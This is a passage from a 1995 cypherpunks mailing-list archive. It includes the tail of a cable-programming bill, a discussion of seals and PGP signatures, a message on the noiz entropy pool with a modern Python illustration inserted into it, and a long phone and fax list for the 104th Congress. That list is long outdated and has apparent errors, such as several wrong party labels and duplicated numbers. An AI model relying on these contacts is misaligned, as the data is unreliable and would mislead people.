means to rearrange the content of the signal of the programming so
that the programming cannot be received by persons unauthorized to
receive the programming.'.
SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS. 
  (a) Public, Educational, and Governmental Channels: Section
611(e) of the Communications Act of 1934 (47 U.S.C. 531(e)) is
amended by inserting before the period the following: `, except a  
cable operator may refuse to transmit any public access program or
portion of a public access program which contains obscenity,
indecency, or nudity'.
(b) Cable Channels for Commercial Use: Section 612(c)(2) of the
Communications Act of 1934 (47 U.S.C. 532(c)(2)) is amended by
striking `an operator' and inserting `a cable operator may refuse
to transmit any leased access program or portion of a leased access
program which contains obscenity, indecency, or nudity.    
 
  
 
 
 
 
  
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <0003701548@mcimail.com>
Date: Tue, 7 Feb 95 20:59:06 PST
To: "cypherpunks@toad.com>
Subject: Fwd: Seals and Sealing Waxes
Message-ID: <10950208045401/0003701548PJ3EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Tue Feb 07, 1995  10:15 PM EST
To: cypherpunks@toad.com
Subject: Fwd: Seals and Sealing Waxes
Message-Id:                                         

TM> "All crypto is economics," and this is what made seals and sealing wax so
TM> useful for so long. Saying "seals were duplicatable from the start" does
TM> not mean this feat was easy, even if technically possible.

TM> In fact, the fine details produced by a good seal are hard to exactly
TM> emulate with a copy. Even on a two-dimensional surface. And with the advent
TM> of three-dimensional surfaces, which sealing wax made possible, the fine
TM> detail of a good seal was in fact very hard to forge.

TM> Not impossible, but very costly with the technology of the day. Or even the
TM> technology of _today_. After all, paper currency is largely based on seal
TM> technology, with various embossing, printing, etc. methods used (on special
TM> paper) that remain fairly hard to duplicate.
    
true. thanks for the reminder of seals. i need to work this analogy into my
current 'lecture' on the usefulness of encryption.

_puzzle palace_ makes reference to british intelligence making use of people
trained into the use of people trained to reproduce seals. this is something 
for us to look out for from the fine folx at nsa. if there is a way to spoof
signatures (as mentioned in another thread recently), they will be perfecting
and perhaps using these methods if they feel the need is great enough.

i promote encryption using pgp with a lot of stress on the privacy and
veracity of documents in business settings. 

how strong is the hash used by pgp? do you think it will eventually be
hashed out in the courts in our favour?(pun semi-intended)
                                  
i'd like digital signatures w/verifiable timestamps be recognised in a
court of law. i don't know of any cases revolving around this issue.
if anyone out there knows of one, i'd be interested in hearing of it
so i can track its progress.

btw: though it is a pain sometimes to weed the noise off this list due
to my (very) limited net access, it has proved to be an excellent
resource. my thanks to the regulars. 

- --if i could code worth a damn i'd be a cypherpunk

amp
<0003701548@mcimail.com>
February 7, 1995   22:17






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 00:11:19 PST
To: Matt Blaze <mab@research.att.com>
Subject: noiz ... and more SKRONK
Message-ID: <199502080810.AAA08113@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


MAB:
> Also, /etc/noiz is an attractive target
> on multi-user machines....

Right.   But you notice I made it mode 660, owner root, group kmem, to
parallel the /dev/*mem devices.   You have the same vulnerabilities as
always on a multi-user system, even if you put /dev/noise in the kernel
or run a TCP daemon.  Another parallel is the randseed.bin file in
PGP.

From an information theory point of view, I don't know how to describe
the kind of shared-entropy that this pool exhibits.  Making the source
of the entropy hidden to the users by crunching on the way out with MD5
adds something to the data -- it's not true entropy, but it's some kind
of effective entropy, from the point of view of the users.  Unless MD5
has weaknesses that I assume it doesn't, it's not really possible for users
to know where their spaces of possible random values overlap, so they
don't know how to exploit it.

A final note -- I should have put /etc/noiz somewhere in the 
/var filesystem.  Perhaps /var/adm/noiz.
But one can edit the Makefile to do that, and no other software
has to actually know where it is, since its access is totally
encapsulated by noizinit, noizstir, and noizout.  The location of
these in /usr/local/bin/ is what needs to be standardized, so I
hope that's good enough for most users.

-------

Oh, I meant to thank everyone for the great discussion and 
constructive criticism of SKRONK and "encrypt tcp connections" hacks.
Especially Perry -- your enumeration of projects was good.

Based on that, and what I know of the others, the priority of 
protocols I'd like to support with skronk are
	0.  my own hack, to get it going
	1.  Matt's ESM
	2.  Kerberized connections (kerb4 or kerb5 or both?)
	3.  Perhaps the SSL from Netscape

Thus SKRONK becomes what I wanted it to be:  a way for sites to
advertize the availability of enhanced services (via the skronk map UDP
daemon) and a way to painlessly integrate crypto with existing code.
(The last aspect always draws user interface problems -- if it's so
transparent, how do you know if you're encrypted?  Right now I have the
client end scribble to stderr when it skronks.)

			strick
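
A sketch of the hashed-output pool idea discussed in the message above, added here as an illustration and not the actual noiz source: the pool file is created mode 660, the raw state never leaves the file, and callers only ever see a hash of it. The function names, the pool layout and the use of SHA-256 in place of the MD5 mentioned in the message are assumptions.

```python
import fcntl
import hashlib
import os
import stat

POOL_MODE = 0o660   # owner and group only, as the message describes


def _h(tag, *parts):
    """Domain-separated hash; SHA-256 stands in for the MD5 in the message."""
    h = hashlib.sha256(tag)
    for part in parts:
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()


def pool_init(path, seed):
    """Create the pool file; O_EXCL refuses to reuse an existing path."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, POOL_MODE)
    try:
        os.fchmod(fd, POOL_MODE)          # set the mode regardless of umask
        os.write(fd, _h(b"init", seed))
    finally:
        os.close(fd)


def _update(path, fn):
    """Read-modify-write under an exclusive lock so two users never share a state."""
    with open(path, "r+b") as f:
        fcntl.flock(f, fcntl.LOCK_EX)
        state = f.read()
        if not state:
            raise ValueError("pool not initialised")
        new_state, result = fn(state)
        f.seek(0)
        f.write(new_state)
        f.truncate()
        return result


def pool_stir(path, noise):
    """Mix new noise into the pool; the old state cannot be recovered from the new."""
    _update(path, lambda s: (_h(b"stir", s, noise), None))


def pool_out(path):
    """Return a hash of the state, then advance the state with a different hash."""
    return _update(path, lambda s: (_h(b"next", s), _h(b"out", s)))


def pool_problems(path, want_uid=None, want_gid=None):
    """List reasons the pool file is exposed; empty list means it looks sane."""
    st = os.lstat(path)                   # lstat: a symlink is itself a finding
    problems = []
    if not stat.S_ISREG(st.st_mode):
        problems.append("not a regular file")
    if st.st_mode & stat.S_IRWXO:
        problems.append("readable or writable by other users")
    if want_uid is not None and st.st_uid != want_uid:
        problems.append("unexpected owner")
    if want_gid is not None and st.st_gid != want_gid:
        problems.append("unexpected group")
    return problems
```

On a deployed system `pool_problems(path, want_uid=0, want_gid=<gid of kmem>)` would also verify the root/kmem ownership the message describes.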





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@c2.org>
Date: Wed, 8 Feb 95 00:41:10 PST
To: cypherpunks@toad.com
Subject: Congressional Phone Numbers
Message-ID: <Pine.SUN.3.91.950208003250.25382A-100000@infinity>
MIME-Version: 1.0
Content-Type: text/plain


In view of recent legislation, I'm going to repost this...No flames please.

NRA.org List of members of 104th Congress

ALASKA
Member                             Phone          Fax Number

Sen. Murkowski, Frank H. (R)       1-202-224-6665 1-202-224-5301
Sen. Stevens, Ted (R)              1-202-224-3004 1-202-224-1044

Young, Donald (R-AL)               1-202-225-5765 1-202-225-5765


ALABAMA
Member                             Phone          Fax Number

Sen. Heflin, Howell T. (D)         1-202-224-4124 1-202-224-3149
Sen. Shelby, Richard C. (R)        1-202-224-5744 1-202-224-3416

Callahan, Sonny (R-01)             1-202-225-4931 1-202-225-0562
Everett, Terry (R-02)              1-202-225-2901
Browder, Glen (D-03)               1-202-225-3261 1-202-225-9020
Bevill, Thomas (D-04)              1-202-225-4876 1-202-225-0842
Cramer, Robert E. (D-05)           1-202-225-4801 1-202-225-4392
Bachus, Spencer (R-06)             1-202-225-4921 1-202-225-2082
Hilliard, Earl F. (D-07)           1-202-225-2665 1-202-226-0772


ARKANSAS
Member                             Phone          Fax Number

Sen. Bumpers, Dale (D)             1-202-224-4843 1-202-224-6435
Sen. Pryor, David (D)              1-202-224-2353 1-202-224-8261

Lambert, Blanche (D-01)            1-202-225-4076 1-202-225-4654
Thornton, Raymond (D-02)           1-202-225-2506 1-202-225-9273
Hutchinson, Tim (R-03)             1-202-225-4301 1-202-226-1163
Dickey, Jay (R-04)                 1-202-225-3772 1-202-225-8646


ARIZONA
Member                             Phone          Fax Number

Sen. Kyl, Jon (R)                  1-202-224-4521 1-202-224-2302
Sen. McCain, John (R)              1-202-224-2235 1-202-228-2862

Salmon, Matt (R-01)                1-202-225-2635 1-202-225-2607
Pastor, Ed (D-02)                  1-202-225-4065 1-202-225-1655
Stump, Robert (R-03)               1-202-225-4576 1-202-225-6328
Shadegg, John (R-04)               1-202-225-3361 1-202-225-1143
Kolbe, James T. (R-05)             1-202-225-2542 1-202-225-0378
Hayworth, J.D. (R-06)              1-202-225-2190 1-202-225-8819


CALIFORNIA
Member                             Phone          Fax Number

Sen. Boxer, Barbara (D)            1-202-225-5161
Sen. Feinstein, Dianne (D)         1-202-224-3841 1-202-228-3954

Riggs, Frank (R-01)                1-202-225-3311 1-202-225-7710
Herger, Walter W. (R-02)           1-202-225-3076 1-202-225-1609
Fazio, Vic (D-03)                  1-202-225-5716 1-202-225-0354
Doolittle, John T. (R-04)          1-202-225-2511 1-202-225-5444
Matsui, Robert T. (D-05)           1-202-225-7163 1-202-225-0566
Woolsey, Lynn (D-06)               1-202-225-5161 1-202-225-5163
Miller, George (D-07)              1-202-225-2095 1-202-225-5609
Pelosi, Nancy (D-08)               1-202-225-4965 1-202-225-8259
Dellums, Ronald V. (D-09)          1-202-225-2661 1-202-225-9817
Baker, Bill (R-10)                 1-202-225-1880 1-202-225-2150
Pombo, Richard (R-11)              1-202-225-1947 1-202-226-0861
Lantos, Thomas (D-12)              1-202-225-3531 1-202-225-3127
Stark, Fortney H. (D-13)           1-202-225-5065
Eshoo, Anna G. (D-14)              1-202-225-8104 1-202-225-8890
Mineta, Norman Y. (D-15)           1-202-225-2631
Lofgren, Zoe (D-16)                1-202-225-3072 1-202-225-9460
Farr, Sam (D-17)
Condit, Gary (D-18)                1-202-225-6131 1-202-225-0819
Radanovich, George (R-19)          1-202-225-4540 1-202-225-5274
Dooley, Calvin M. (D-20)           1-202-225-3341 1-202-225-9308
Thomas, Bill (R-21)                1-202-225-2915 1-202-225-8798
Seastrand, Andrea (R-22)           1-202-225-3601 1-202-226-1015
Gallegly, Elton (R-23)             1-202-225-5811 1-202-225-1100
Beilenson, Anthony (D-24)          1-202-225-5911
McKeon, Howard P. (R-25)           1-202-225-1956 1-202-226-0683
Berman, Howard L. (D-26)           1-202-225-4695 1-202-225-5279
Moorhead, Carlos J. (R-27)         1-202-225-4176 1-202-226-1279
Dreier, David (R-28)               1-202-225-2305 1-202-225-4745
Waxman, Henry A. (D-29)            1-202-225-3976 1-202-225-4099
Becerra, Xavier (D-30)             1-202-225-6235 1-202-225-2202
Martinez, Matthew G. (D-31)        1-202-225-5464 1-202-225-4467
Dixon, Julian C. (D-32)            1-202-225-7084 1-202-225-4091
Roybal-Allard, Lucille (D-33)      1-202-225-1766 1-202-226-0350
Torres, Esteban E. (D-34)          1-202-225-5256 1-202-225-9711
Waters, Maxine (D-35)              1-202-225-2201 1-202-225-7584
Harman, Jane (D-36)                1-202-225-8220 1-202-226-0684
Tucker III, Walter R. (D-37)       1-202-225-7924 1-202-225-7926
Horn, Steve (R-38)                 1-202-225-6676 1-202-226-1012
Royce, Ed (R-39)                   1-202-225-4111 1-202-226-0335
Lewis, Jerry (R-40)                1-202-225-5861 1-202-225-6498
Kim, Jay C. (R-41)                 1-202-225-3201 1-202-226-1485
Brown Jr., George E. (D-42)        1-202-225-6161 1-202-225-8671
Calvert, Kenneth (R-43)            1-202-225-1986
Bono, Sonny (R-44)                 1-202-225-5330 1-202-226-1040
Rohrabacher, Dana (R-45)           1-202-225-2415 1-202-225-7067
Dornan, Robert K. (R-46)           1-202-225-2965 1-202-225-3694
Cox, Christopher (R-47)            1-202-225-5611 1-202-225-9177
Packard, Ronald (R-48)             1-202-225-3906 1-202-225-0134
Bilbray, Brian (R-49)              1-202-225-2040 1-202-225-2042
Filner, Bob (D-50)                 1-202-225-8045 1-202-225-9073
Cunningham, Randy (R-51)           1-202-225-5452 1-202-225-2558
Hunter, Duncan L. (R-52)           1-202-225-5672 1-202-225-0235


COLORADO
Member                             Phone          Fax Number

Sen. Campbell, Ben N. (D)          1-202-225-4761 1-202-225-0228
Sen. Brown, Henry (R)              1-202-224-5941 1-202-224-6471

Schroeder, Patricia (D-01)         1-202-225-4431 1-202-225-5842
Skaggs, David E. (D-02)            1-202-225-2161 1-202-225-9127
McInnis, Scott (R-03)              1-202-225-4761 1-202-226-0622
Allard, Wayne (R-04)               1-202-225-4676 1-202-225-8630
Hefley, Joel (R-05)                1-202-225-4422 1-202-225-1942
Schaefer, Daniel (R-06)            1-202-225-7882 1-202-225-7885


CONNECTICUT
Member                             Phone          Fax Number

Sen. Dodd, Christopher J. (D-CT)   1-202-224-2823
Sen. Lieberman, Joseph I. (D-CT)   1-202-224-4041 1-202-224-9750

Kennelly, Barbara B. (D-01)        1-202-225-2265 1-202-225-1031
Gejdenson, Samuel (D-02)           1-202-225-2076 1-202-225-4977
DeLauro, Rosa (D-03)               1-202-225-3661 1-202-225-4890
Shays, Christopher (R-04)          1-202-225-5541 1-202-225-9629
Franks, Gary (R-05)                1-202-225-3822 1-202-225-5085
Johnson, Nancy L. (R-06)           1-202-225-4476 1-202-225-4488


WASHINGTON, D.C.
Member                             Phone          Fax Number

Del. Norton, Eleanor Holmes (D-AL) 1-202-225-8050 1-202-225-3002


DELAWARE
Member                             Phone          Fax Number

Sen. Biden Jr., Joseph R. (D)      1-202-224-5042 1-202-224-0139
Sen. Roth Jr., William V. (R)      1-202-224-2441 1-202-224-2805

Castle, Michael N. (R-AL)          1-202-225-4165 1-202-225-2291


FLORIDA
Member                             Phone          Fax Number

Sen. Graham, Bob (D)               1-202-224-3041 1-202-224-2237
Sen. Mack, Connie (R)              1-202-224-5274 1-202-224-8022

Scarborough, Joe (R-01)            1-202-225-4136 1-202-225-5785
Peterson, Peter (D-02)             1-202-225-5235 1-202-225-1586
Brown, Corrine (D-03)              1-202-225-0123 1-202-225-2256
Fowler, Tillie (R-04)              1-202-225-2501 1-202-225-9318
Thurman, Karen (R-05)              1-202-225-1002 1-202-226-0329
Stearns, Clifford B. (R-06)        1-202-225-5744 1-202-225-3973
Mica, John L. (R-07)               1-202-225-4035 1-202-226-0821
McCollum, William (R-08)           1-202-225-2176 1-202-225-0999
Bilirakis, Michael (R-09)          1-202-225-5755 1-202-225-4085
Young, C. W. Bill (R-10)           1-202-225-5961 1-202-225-9764
Gibbons, Samuel M. (D-11)          1-202-225-3376
Canady, Charles T. (R-12)          1-202-225-1252 1-202-225-2279
Miller, Dan (R-13)                 1-202-225-5015 1-202-226-0828
Goss, Porter J. (R-14)             1-202-225-2536 1-202-225-6820
Weldon, Dave (R-15)                1-202-225-3671 1-202-225-9039
Foley, Mark (R-16)                 1-202-225-5792 1-202-225-1860
Meek, Carrie (D-17)                1-202-225-4506 1-202-226-0777
Ros-Lehtinen, Ileana (R-18)        1-202-225-3931 1-202-225-5620
Johnston II, Harry (D-19)          1-202-225-3001 1-202-225-8791
Deutsch, Peter (D-20)              1-202-225-7931 1-202-225-8456
Diaz-Balart, Lincoln (R-21)        1-202-225-4211 1-202-225-8576
Shaw Jr., E. Clay (R-22)           1-202-225-3026 1-202-225-8398
Hastings, Alcee L. (D-23)          1-202-225-1313 1-202-225-0690


GEORGIA
Member                             Phone          Fax Number

Sen. Coverdell, Paul (R)           1-202-224-3643 1-202-228-3783
Sen. Nunn, Samuel (D)              1-202-224-3521 1-202-224-0072

Kingston, Jack (R-01)              1-202-225-5831 1-202-226-2269
Bishop, Sanford (D-02)             1-202-225-3631 1-202-225-2203
Collins, Michael (Mac) (R-03)      1-202-225-5901 1-202-225-2515
Linder, John (R-04)                1-202-225-4272 1-202-225-4696
Lewis, John (D-05)                 1-202-225-3801 1-202-225-0351
Gingrich, Newt (R-06)              1-202-225-4501 1-202-225-4656
Barr, Bob (R-07)                   1-202-225-2931 1-202-225-0473
Chambliss, Saxby (R-08)            1-202-225-6531 1-202-225-7719
Deal, Nathan (D-09)                1-202-225-5211 1-202-225-8272
Norwood, Charles (D-10)            1-202-225-4101 1-202-226-1466
McKinney, Cynthia (D-11)           1-202-225-1605 1-202-226-0691


GUAM
Member                             Phone          Fax Number

Del. Underwood, Robert A. (D-AL)   1-202-225-1188 1-202-226-0341


HAWAII
Member                             Phone          Fax Number

Sen. Akaka, Daniel K. (D)          1-202-224-6361 1-202-224-2126
Sen. Inouye, Daniel K. (D)         1-202-224-3934 1-202-224-6747

Abercrombie, Neil (D-01)           1-202-225-2726 1-202-225-4580
Mink, Patsy T. (D-02)              1-202-225-4906 1-202-225-4987


IOWA
Member                             Phone          Fax Number

Sen. Grassley, Charles E. (R)      1-202-224-3744 1-202-224-6020
Sen. Harkin, Thomas (D)            1-202-224-3254 1-202-224-7431

Leach, James (R-01)                1-202-225-6576 1-202-226-1278
Nussle, James Allen (R-02)         1-202-225-2911 1-202-225-9129
Lightfoot, James R. (R-03)         1-202-225-3806 1-202-225-6973
Ganske, Greg (R-04)                1-202-225-4426
Latham, Tom (R-05)                 1-202-225-5476 1-202-225-6929


IDAHO
Member                             Phone          Fax Number

Sen. Kempthorne, Dirk (R)          1-202-224-6142 1-202-224-5893
Sen. Craig, Larry E. (R)           1-202-224-2752 1-202-224-2573

Chenoweth, Helen (R-01)            1-202-225-6611 1-202-226-1213
Crapo, Michael D. (R-02)           1-202-225-5531 1-202-225-8216


ILLINOIS
Member                             Phone          Fax Number

Sen. Moseley-Braun, Carol (D)      1-202-224-2854 1-202-224-2626
Sen. Simon, Paul (D)               1-202-224-2152 1-202-224-0868

Rush, Bobby L. (D-01)              1-202-225-4372 1-202-226-0333
Reynolds, Mel (D-02)               1-202-225-0773 1-202-225-0774
Lipinski, William O. (D-03)        1-202-225-5701 1-202-225-1012
Gutierrez, Luis V. (R-04)          1-202-225-8203 1-202-225-7810
Flanagan, Mike (R-05)              1-202-225-4061 1-202-225-4064
Hyde, Henry J. (R-06)              1-202-225-4561 1-202-226-1240
Collins, Cardiss (D-07)            1-202-225-5006 1-202-225-8396
Crane, Philip M. (R-08)            1-202-225-3711 1-202-225-7830
Yates, Sidney R. (D-09)            1-202-225-2111 1-202-225-3493
Porter, John E. (R-10)             1-202-225-4835 1-202-225-0157
Weller, Gerald (R-11)              1-202-225-3635 1-202-225-4447
Costello, Jerry F. (D-12)          1-202-225-5661 1-202-225-0285
Fawell, Harris W. (R-13)           1-202-225-3515 1-202-225-9420
Hastert, J. Dennis (R-14)          1-202-225-2976 1-202-225-0697
Ewing, Thomas (R-15)               1-202-225-2371 1-202-225-8071
Manzullo, Donald (R-16)            1-202-225-5676 1-202-225-5284
Evans, Lane (D-17)                 1-202-225-5905 1-202-225-5396
LaHood, Ray (R-18)                 1-202-225-6201 1-202-225-9461
Poshard, Glendal W. (D-19)         1-202-225-5201 1-202-225-1541
Durbin, Richard J. (D-20)          1-202-225-5271 1-202-225-0170


INDIANA
Member                             Phone          Fax Number

Sen. Coats, Daniel R. (R)          1-202-224-5623 1-202-224-8964
Sen. Lugar, Richard G. (R)         1-202-224-4814 1-202-224-7877

Visclosky, Peter J. (D-01)         1-202-225-2461 1-202-225-2493
McIntosh, David (D-02)             1-202-225-3021 1-202-225-8140
Roemer, Timothy (D-03)             1-202-225-3915 1-202-225-6798
Souder, Mark (R-04)                1-202-225-4436 1-202-225-8810
Buyer, Steve (D-05)                1-202-225-5037
Burton, Daniel (R-06)              1-202-225-2276 1-202-225-0016
Myers, John T. (R-07)              1-202-225-5805 1-202-225-1649
Hostettler, John (R-08)            1-202-225-4636 1-202-225-4688
Hamilton, Lee (D-09)               1-202-225-5315 1-202-225-1101
Jacobs Jr., Andrew (D-10)          1-202-225-4011 1-202-226-4093


KANSAS
Member                             Phone          Fax Number

Sen. Kassebaum, Nancy L. (R)       1-202-224-4774 1-202-224-3514
Sen. Dole, Robert (R)              1-202-224-6521 1-202-224-8952

Roberts, Pat (R-01)                1-202-225-2715 1-202-225-5375
Brownback, Sam (R-02)              1-202-225-6601 1-202-225-1445
Meyers, Jan (R-03)                 1-202-225-2865 1-202-225-0554
Tiahrt, Todd (R-04)                1-202-225-6216 1-202-225-5398


KENTUCKY
Member                             Phone          Fax Number

Sen. McConnell, Mitch (R)          1-202-224-2541 1-202-224-2499
Sen. Ford, Wendell H. (D)          1-202-224-4343 1-202-224-0046

Whitfield, Edward (R-01)           1-202-225-3115 1-202-225-2169
Lewis, Ron (R-02)                  1-202-225-3501
Ward, Mike (R-03)                  1-202-225-5401
Bunning, James (R-04)              1-202-225-3465 1-202-225-0003
Rogers, Harold (R-05)              1-202-225-4601 1-202-225-0940
Baesler, Scotty (D-06)             1-202-225-4706 1-202-225-2122


LOUISIANA
Member                             Phone          Fax Number

Sen. Johnston, J. Bennett (D)      1-202-224-5824 1-202-224-2952
Sen. Breaux, John B. (D)           1-202-224-4623 1-202-224-2435

Livingston, Robert (R-01)          1-202-225-3015 1-202-225-0739
Jefferson, William (D-02)          1-202-225-6636 1-202-225-1988
Tauzin, W. J. (Billy) (D-03)       1-202-225-4031 1-202-225-0563
Fields, Cleo (D-04)                1-202-225-8490 1-202-225-8959
McCrery, James (R-05)              1-202-225-2777 1-202-225-8039
Baker, Richard H. (R-06)           1-202-225-3901 1-202-225-7313
Hayes, James A. (D-07)             1-202-225-2031 1-202-225-1175


MASSACHUSETTS
Member                             Phone          Fax Number

Sen. Kennedy, Edward M. (D)        1-202-224-4543 1-202-224-2417
Sen. Kerry, John F. (D)            1-202-224-2742 1-202-224-8525

Olver, John W. (D-01)              1-202-225-5335 1-202-226-1224
Neal, Richard E. (D-02)            1-202-225-5601 1-202-225-8112
Blute, Peter I. (R-03)             1-202-225-6101 1-202-225-2217
Frank, Barney (D-04)               1-202-225-5931 1-202-225-0182
Meehan, Martin T. (D-05)           1-202-225-3411 1-202-226-0771
Torkildsen, Peter G. (R-06)        1-202-225-8020 1-202-225-8037
Markey, Edward J. (D-07)           1-202-225-2836 1-202-225-8689
Kennedy II, Joseph P. (D-08)       1-202-225-5111 1-202-225-9322
Moakley, John Joseph (D-09)        1-202-225-8273 1-202-225-7304
Studds, Gerry E. (D-10)            1-202-225-3111 1-202-225-2212



MARYLAND
Member                             Phone          Fax Number

Sen. Mikulski, Barbara A. (D)      1-202-224-4654 1-202-224-8858
Sen. Sarbanes, Paul S. (D)         1-202-224-4524 1-202-224-1651

Gilchrest, Wayne T. (R-01)         1-202-225-5311 1-202-225-0254
Ehrlich, Bob (R-02)                1-202-225-3061 1-202-225-4251
Cardin, Benjamin L. (D-03)         1-202-225-4016 1-202-225-9219
Wynn, Albert R. (D-04)             1-202-225-8699 1-202-225-8714
Hoyer, Steny H. (D-05)             1-202-225-4131 1-202-225-4300
Bartlett, Roscoe G. (R-06)         1-202-225-2721 1-202-225-2193
Mfume, Kweisi (D-07)               1-202-225-4741 1-202-225-3178
Morella, Constance (R-08)          1-202-225-5341 1-202-225-1389


MAINE
Member                             Phone          Fax Number

Sen. Snowe, Olympia (R)            1-202-224-5344 1-202-224-6853
Sen. Cohen, William S. (R)         1-202-224-2523 1-202-224-2693

Longley, James (R-01)              1-202-225-6116 1-202-225-9065
Baldacci, John (D-02)              1-202-225-6306 1-202-225-8297


MICHIGAN
Member                             Phone          Fax Number

Sen. Levin, Carl (D)               1-202-224-6221
Sen. Abraham, Spencer (R)          1-202-224-4822 1-202-224-8834

Stupak, Bart (D-01)                1-202-225-4735 1-202-225-4744
Hoekstra, Peter (R-02)             1-202-225-4401 1-202-226-0779
Ehlers, Vernon (R-03)              1-202-225-3831 1-202-225-5144
Camp, David Lee (R-04)             1-202-225-3561 1-202-225-9679
Barcia, James A. (D-05)            1-202-225-8171 1-202-225-2168
Upton, Frederick S. (R-06)         1-202-225-3761 1-202-225-4986
Smith, Nick (R-07)                 1-202-225-6276 1-202-225-6281
Chrysler, Dick (R-08)              1-202-225-4872 1-202-225-1260
Kildee, Dale E. (D-09)             1-202-225-3611 1-202-225-6393
Bonior, David E. (D-10)            1-202-225-2106 1-202-226-1169
Knollenberg, Joe (R-11)            1-202-225-5802 1-202-226-2356
Levin, Sander M. (D-12)            1-202-225-4961 1-202-226-1033
Rivers, Lynn (D-13)                1-202-225-6261 1-202-225-0489
Conyers Jr., John (D-14)           1-202-225-5126 1-202-225-0072
Collins, Barbara (D-15)            1-202-225-2261 1-202-225-6645
Dingell, John D. (D-16)            1-202-225-4071 1-202-225-7426


MINNESOTA
Member                             Phone          Fax Number

Sen. Grams, Rod (R)                1-202-224-3244 1-202-228-0956
Sen. Wellstone, Paul (D)           1-202-224-5641 1-202-224-8438

Gutknecht, Gil (R-01)              1-202-225-2472 1-202-225-0051
Minge, David (D-02)                1-202-225-2331 1-202-226-0836
Ramstad, James M. (R-03)           1-202-225-2871 1-202-225-6351
Vento, Bruce F. (D-04)             1-202-225-6631 1-202-225-1968
Sabo, Martin Olav (D-05)           1-202-225-4755 1-202-225-4886
Luther, William (D-06)             1-202-225-2271 1-202-225-9802
Peterson, Collin C. (D-07)         1-202-225-2165 1-202-225-1593
Oberstar, James L. (D-08)          1-202-225-6211 1-202-225-0699


MISSOURI
Member                             Phone          Fax Number

Sen. Bond, Christopher S. (R)      1-202-224-5721 1-202-224-8149
Sen. Ashcroft, John (R)            1-202-224-6154 1-202-224-7615

Clay, William L. (D-01)            1-202-225-2406 1-202-225-1725
Talent, James M. (R-02)            1-202-225-2561 1-202-225-2563
Gephardt, Richard A. (D-03)        1-202-225-2671 1-202-225-7452
Skelton, Ike (D-04)                1-202-225-2876 1-202-225-2695
McCarthy, Karen (D-05)             1-202-225-4535 1-202-225-5990
Danner, Pat (D-06)                 1-202-225-7041 1-202-225-8221
Hancock, Melton D. (R-07)          1-202-225-6536 1-202-225-7700
Emerson, Bill (R-08)               1-202-225-4404 1-202-225-9621
Volkmer, Harold L. (D-09)          1-202-225-2956 1-202-225-7834


MISSISSIPPI
Member                             Phone          Fax Number

Sen. Cochran, Thad (R)             1-202-224-5054 1-202-224-3576
Sen. Lott, Trent (R)               1-202-224-6253 1-202-224-2262

Wicker, Roger (R-01)               1-202-225-4306 1-202-225-4328
Thompson, Bennie (D-02)            1-202-225-5876 1-202-225-5898
Montgomery, G. V. (D-03)           1-202-225-5031 1-202-225-3375
Parker, Mike (D-04)                1-202-225-5865 1-202-225-5886
Taylor, Gene (D-05)                1-202-225-5772 1-202-225-7074


MONTANA
Member                             Phone          Fax Number

Sen. Burns, Conrad R. (R)          1-202-224-2644 1-202-224-8594
Sen. Baucus, Max (D)               1-202-224-2651

Williams, Pat (D-AL)               1-202-225-3211 1-202-226-0244


NORTH CAROLINA
Member                             Phone          Fax Number

Sen. Helms, Jesse (R)              1-202-224-6342 1-202-224-7588
Sen. Faircloth, Lauch (R)          1-202-224-3154 1-202-224-7406

Clayton, Eva (D-01)                1-202-225-3101 1-202-225-3354
Funderburk, Dave (R-02)            1-202-225-4531 1-202-225-1539
Jones, Walter (R-03)               1-202-225-3415 1-202-225-0666
Heineman, F. (R-04)                1-202-225-1784 1-202-225-6314
Burr, Richard (R-05)               1-202-225-2071 1-202-225-4060
Coble, Howard (R-06)               1-202-225-3065 1-202-225-8611
Rose, Charles (D-07)               1-202-225-2731 1-202-225-2470
Hefner, Bill (D-08)                1-202-225-3715 1-202-225-4036
Myrick, Sue (R-09)                 1-202-225-1976 1-202-225-8995
Ballenger, Cass (R-10)             1-202-225-2576 1-202-225-0316
Taylor, Charles Hart (R-11)        1-202-225-6401 1-202-251-0794
Watt, Melvin (D-12)                1-202-225-1510 1-202-225-1512


NORTH DAKOTA
Member                             Phone          Fax Number

Sen. Dorgan, Byron L. (D)          1-202-225-2611 1-202-225-9436
Sen. Conrad, Kent (D)              1-202-224-2043 1-202-224-7776

Pomeroy, Earl (D-AL)               1-202-225-2611 1-202-226-0893


NEBRASKA
Member                             Phone          Fax Number

Sen. Exon, J. James (D)            1-202-224-4224 1-202-224-5213
Sen. Kerrey, Joseph R. (D)         1-202-224-6551 1-202-224-7645

Bereuter, Douglas (R-01)           1-202-225-4806 1-202-226-1148
Christensen, Jon (R-02)            1-202-225-4155 1-202-225-4684
Barrett, William E. (R-03)         1-202-225-6435 1-202-225-0207


NEW HAMPSHIRE
Member                             Phone          Fax Number

Sen. Gregg, Judd (R)               1-202-224-3324 1-202-224-4952
Sen. Smith, Robert (R)             1-202-224-2841 1-202-224-1353

Zeliff Jr., William (R-01)         1-202-225-5456 1-202-225-4370
Bass, Charles (D-02)               1-202-225-5206 1-202-225-0046


NEW JERSEY
Member                             Phone          Fax Number

Sen. Lautenberg, Frank R. (D)      1-202-224-4744 1-202-224-9707
Sen. Bradley, William (D)          1-202-224-3224 1-202-224-8567

Andrews, Robert E. (D-01)          1-202-225-6501 1-202-225-6583
LoBiondo, Frank (R-02)             1-202-225-6572 1-202-226-1108
Saxton, Jim (R-03)                 1-202-225-4765 1-202-225-0778
Smith, Christopher (R-04)          1-202-225-3765 1-202-225-7768
Roukema, Marge (R-05)              1-202-225-4465 1-202-225-9048
Pallone Jr., Frank (D-06)          1-202-225-4671 1-202-225-9665
Franks, Bob (R-07)                 1-202-225-5361 1-202-225-9460
Martini, Bill (R-08)               1-202-225-5751 1-202-226-2273
Torricelli, Robert (D-09)          1-202-224-5061 1-202-225-0843
Payne, Donald M. (D-10)            1-202-225-3436 1-202-225-4160
Frelinghuysen, Rodney (R-11)       1-202-225-5034 1-202-225-0658
